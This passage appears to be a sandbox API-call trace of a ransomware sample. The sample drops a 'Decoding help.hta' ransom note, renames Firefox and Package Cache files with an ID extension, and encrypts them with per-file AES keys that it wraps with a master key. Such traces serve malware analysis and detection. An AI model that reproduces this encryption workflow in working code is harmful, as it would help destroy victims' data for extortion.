lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\", lpString2="packages" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages" [0042.089] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\*.*" [0042.089] GlobalMemoryStatus (in: lpBuffer=0x7a0fd10 | out: lpBuffer=0x7a0fd10) [0042.089] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x108e05f8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x53c [0042.090] CloseHandle (hObject=0x53c) returned 1 [0042.090] FindNextFileW (in: hFindFile=0x5d8a90, lpFindFileData=0x7a0fd30 | out: lpFindFileData=0x7a0fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb95720, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcb95720, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcb95720, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 0 [0042.090] FindClose (in: hFindFile=0x5d8a90 | out: hFindFile=0x5d8a90) returned 1 Thread: id = 237 os_tid = 0x664 [0040.554] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\*.*", lpFindFileData=0x123dfd30 | out: lpFindFileData=0x123dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaef68420, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf288100, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xaf288100, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a53b0 [0041.497] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0041.497] FindNextFileW (in: hFindFile=0x5a53b0, lpFindFileData=0x123dfd30 | out: lpFindFileData=0x123dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaef68420, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf288100, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xaf288100, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.498] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0041.498] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0041.498] FindNextFileW (in: hFindFile=0x5a53b0, lpFindFileData=0x123dfd30 | out: lpFindFileData=0x123dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf23be40, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf23be40, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xd4910680, ftLastWriteTime.dwHighDateTime=0x1ced1d0, nFileSizeHigh=0x0, nFileSizeLow=0x14623, dwReserved0=0x0, dwReserved1=0x0, cFileName="blocklist.xml", cAlternateFileName="BLOCKL~1.XML")) returned 1 [0041.498] lstrcpyW (in: lpString1=0x983a6a8, lpString2="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\*.*" [0041.498] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\*.*") returned 54 [0041.498] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\Decoding help.hta" [0041.498] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\Decoding help.hta" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\decoding help.hta")) returned 0xffffffff [0041.498] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\Decoding help.hta" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0041.498] WriteFile (in: hFile=0x128, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x123dfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x123dfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0041.499] CloseHandle (hObject=0x128) returned 1 [0041.499] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.499] lstrcmpiW (lpString1="Decoding help.hta", lpString2="blocklist.xml") returned 1 [0041.499] lstrlenW (lpString="blocklist.xml") returned 13 [0041.499] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\*.*" [0041.499] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\*.*") returned 54 [0041.500] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\", lpString2="blocklist.xml" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\blocklist.xml") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\blocklist.xml" [0041.500] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\blocklist.xml" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\blocklist.xml") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\blocklist.xml" [0041.500] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\blocklist.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\blocklist.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\blocklist.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0041.500] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\blocklist.xml" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\blocklist.xml"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\blocklist.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\blocklist.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0041.500] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\blocklist.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\blocklist.xml.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0041.500] CreateFileMappingA (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x358 [0041.500] CryptAcquireContextA (in: phProv=0x123dfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x123dfcec*=0x3449ce8) returned 1 [0043.855] CryptGenKey (in: hProv=0x3449ce8, Algid=0x6610, dwFlags=0x1, phKey=0x123dfce8 | out: phKey=0x123dfce8*=0x5a5330) returned 1 [0043.855] CryptExportKey (in: hKey=0x5a5330, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x123dfbe4, pdwDataLen=0x123dfce4 | out: pbData=0x123dfbe4*, pdwDataLen=0x123dfce4*=0x2c) returned 1 [0043.856] MapViewOfFile (hFileMappingObject=0x358, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x14620) returned 0x3a40000 [0044.191] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x123dfbe4*, pdwDataLen=0x123dfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x123dfbe4*, pdwDataLen=0x123dfcf8*=0x100) returned 1 [0047.323] CryptEncrypt (in: hKey=0x5a5330, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3a40000, pdwDataLen=0x123dfce4*=0x14620, dwBufLen=0x14620 | out: pbData=0x3a40000*, pdwDataLen=0x123dfce4*=0x14620) returned 1 [0047.355] UnmapViewOfFile (lpBaseAddress=0x3a40000) returned 1 [0047.381] CloseHandle (hObject=0x358) returned 1 [0047.381] CryptDestroyKey (hKey=0x5a5330) returned 1 [0047.381] CryptReleaseContext (hProv=0x3449ce8, dwFlags=0x0) returned 1 [0047.382] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0047.382] WriteFile (in: hFile=0x128, lpBuffer=0x123dfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x123dfcf8, lpOverlapped=0x0 | out: lpBuffer=0x123dfbe4*, lpNumberOfBytesWritten=0x123dfcf8*=0x100, lpOverlapped=0x0) returned 1 [0049.453] WriteFile (in: hFile=0x128, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x123dfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x123dfcf8*=0x500, lpOverlapped=0x0) returned 1 [0049.453] CloseHandle (hObject=0x128) returned 1 [0050.404] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\blocklist.xml.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0053.658] FindNextFileW (in: hFindFile=0x5a53b0, lpFindFileData=0x123dfd30 | out: lpFindFileData=0x123dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf261fa0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf261fa0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x132cbe00, ftLastWriteTime.dwHighDateTime=0x1ced1dd, nFileSizeHigh=0x0, nFileSizeLow=0x28, dwReserved0=0x0, dwReserved1=0x0, cFileName="chrome.manifest", cAlternateFileName="CHROME~1.MAN")) returned 1 [0053.658] lstrcpyW (in: lpString1=0x2a740278, lpString2="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\*.*" [0053.658] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\*.*") returned 54 [0053.658] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\Decoding help.hta" [0053.658] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\Decoding help.hta" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\decoding help.hta")) returned 0x1 [0053.658] lstrcmpiW (lpString1="Decoding help.hta", lpString2="chrome.manifest") returned 1 [0053.658] lstrlenW (lpString="chrome.manifest") returned 15 [0053.658] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\*.*" [0053.658] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\*.*") returned 54 [0053.659] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\", lpString2="chrome.manifest" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\chrome.manifest") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\chrome.manifest" [0053.659] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\chrome.manifest" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\chrome.manifest") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\chrome.manifest" [0053.659] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\chrome.manifest", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\chrome.manifest.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\chrome.manifest.[ID]g9uZrLhJaygpwRm1[ID]" [0053.659] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\chrome.manifest" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\chrome.manifest"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\chrome.manifest.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\chrome.manifest.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.213] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\chrome.manifest.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\chrome.manifest.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0058.213] CreateFileMappingA (hFile=0x3e4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xa20 [0058.214] CryptAcquireContextA (in: phProv=0x123dfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x123dfcec*=0x3449028) returned 1 [0060.186] CryptGenKey (in: hProv=0x3449028, Algid=0x6610, dwFlags=0x1, phKey=0x123dfce8 | out: phKey=0x123dfce8*=0x42cf418) returned 1 [0060.186] CryptExportKey (in: hKey=0x42cf418, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x123dfbe4, pdwDataLen=0x123dfce4 | out: pbData=0x123dfbe4*, pdwDataLen=0x123dfce4*=0x2c) returned 1 [0060.186] MapViewOfFile (hFileMappingObject=0xa20, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x20) returned 0x3fa0000 [0063.821] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x123dfbe4*, pdwDataLen=0x123dfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x123dfbe4*, pdwDataLen=0x123dfcf8*=0x100) returned 1 [0063.822] CryptEncrypt (in: hKey=0x42cf418, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3fa0000*, pdwDataLen=0x123dfce4*=0x20, dwBufLen=0x20 | out: pbData=0x3fa0000*, pdwDataLen=0x123dfce4*=0x20) returned 1 [0063.822] UnmapViewOfFile (lpBaseAddress=0x3fa0000) Thread: id = 238 os_tid = 0x918 [0040.555] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*.*", lpFindFileData=0x1251fd30 | out: lpFindFileData=0x1251fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xecd0b340, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xecd314a0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xecd314a0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8a50 [0042.087] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.087] FindNextFileW (in: hFindFile=0x5d8a50, lpFindFileData=0x1251fd30 | out: lpFindFileData=0x1251fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xecd0b340, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xecd314a0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xecd314a0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.087] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.087] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.087] FindNextFileW (in: hFindFile=0x5d8a50, lpFindFileData=0x1251fd30 | out: lpFindFileData=0x1251fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecd314a0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xecd314a0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xf08b3aa0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x28e, dwReserved0=0x0, dwReserved1=0x0, cFileName="state.rsm", cAlternateFileName="")) returned 1 [0042.087] lstrcpyW (in: lpString1=0x10ba6450, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*.*" [0042.087] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*.*") returned 75 [0042.087] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\Decoding help.hta" [0042.087] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\Decoding help.hta" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\decoding help.hta")) returned 0xffffffff [0042.087] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\Decoding help.hta" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0042.272] WriteFile (in: hFile=0x5ac, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1251fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1251fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0042.273] CloseHandle (hObject=0x5ac) returned 1 [0042.273] SetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0042.274] lstrcmpiW (lpString1="Decoding help.hta", lpString2="state.rsm") returned -1 [0042.274] lstrlenW (lpString="state.rsm") returned 9 [0042.274] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*.*" [0042.274] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*.*") returned 75 [0042.274] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\", lpString2="state.rsm" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm" [0042.274] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm" [0042.274] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm.[ID]g9uZrLhJaygpwRm1[ID]" [0042.274] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0042.883] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6c0 [0042.883] CreateFileMappingA (hFile=0x6c0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x56c [0042.883] CryptAcquireContextA (in: phProv=0x1251fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1251fcec*=0x3448d80) returned 1 [0042.884] CryptGenKey (in: hProv=0x3448d80, Algid=0x6610, dwFlags=0x1, phKey=0x1251fce8 | out: phKey=0x1251fce8*=0x5db338) returned 1 [0042.884] CryptExportKey (in: hKey=0x5db338, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1251fbe4, pdwDataLen=0x1251fce4 | out: pbData=0x1251fbe4*, pdwDataLen=0x1251fce4*=0x2c) returned 1 [0042.884] MapViewOfFile (hFileMappingObject=0x56c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x280) returned 0x8ba0000 [0042.909] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1251fbe4*, pdwDataLen=0x1251fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1251fbe4*, pdwDataLen=0x1251fcf8*=0x100) returned 1 [0042.909] CryptEncrypt (in: hKey=0x5db338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8ba0000*, pdwDataLen=0x1251fce4*=0x280, dwBufLen=0x280 | out: pbData=0x8ba0000*, pdwDataLen=0x1251fce4*=0x280) returned 1 [0042.909] UnmapViewOfFile (lpBaseAddress=0x8ba0000) returned 1 [0042.911] CloseHandle (hObject=0x56c) returned 1 [0042.911] CryptDestroyKey (hKey=0x5db338) returned 1 [0042.911] CryptReleaseContext (hProv=0x3448d80, dwFlags=0x0) returned 1 [0042.911] SetFilePointerEx (in: hFile=0x6c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0042.911] WriteFile (in: hFile=0x6c0, lpBuffer=0x1251fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x1251fcf8, lpOverlapped=0x0 | out: lpBuffer=0x1251fbe4*, lpNumberOfBytesWritten=0x1251fcf8*=0x100, lpOverlapped=0x0) returned 1 [0042.912] WriteFile (in: hFile=0x6c0, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x1251fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x1251fcf8*=0x500, lpOverlapped=0x0) returned 1 [0042.912] CloseHandle (hObject=0x6c0) returned 1 [0042.913] SetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0042.913] FindNextFileW (in: hFindFile=0x5d8a50, lpFindFileData=0x1251fd30 | out: lpFindFileData=0x1251fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecd0b340, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xecd0b340, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xd3ea4f80, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x6f428, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcredist_x86.exe", cAlternateFileName="VCREDI~1.EXE")) returned 1 [0042.913] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\ProgramData\\Package 